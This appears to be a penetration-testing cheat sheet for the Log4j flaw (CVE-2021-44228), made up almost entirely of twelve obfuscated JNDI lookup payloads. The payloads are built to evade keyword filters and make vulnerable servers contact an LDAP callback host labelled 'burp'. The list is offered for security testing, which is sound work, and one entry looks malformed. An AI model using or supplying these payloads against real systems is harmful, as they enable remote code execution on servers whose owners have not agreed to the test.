Log4j

Java payloads for log4j vulnerability testing

Payloads

${${env:ENV_NAME:-j}ndi${env:ENV_NAME:-:}${env:ENV_NAME:-l}dap${env:ENV_NAME:-:}//burp/1}
${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://burp/2}
${${upper:j}ndi:${upper:l}${upper:d}a${lower:p}://burp/3}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://burp/4}
${jnd${upper:i}:ldap://burp/5}
${jnd${sys:SYS_NAME:-i}:ldap:/burp/6}
${j${${:-l}${:-o}${:-w}${:-e}${:-r}:n}di:ldap://burp/7}
${${date:'j'}${date:'n'}${date:'d'}${date:'i'}:${date:'l'}${date:'d'}${date:'a'}${date:'p'}://burp/8}
${${what:ever:-j}${some:thing:-n}${other:thing:-d}${and:last:-i}:ldap://burp/9}
{   "one-${jnd${a":"a:-i}:ld${", "two":"o:-a}p://burp/10}}
${\u006a\u006e\u0064\u0069:ldap://burp/11}
${jndi:ldap://127.0.0.1#burp/12}

Reference

https://github.com/Puliczek/CVE-2021-44228-PoC-log4j-bypass-words

Last updated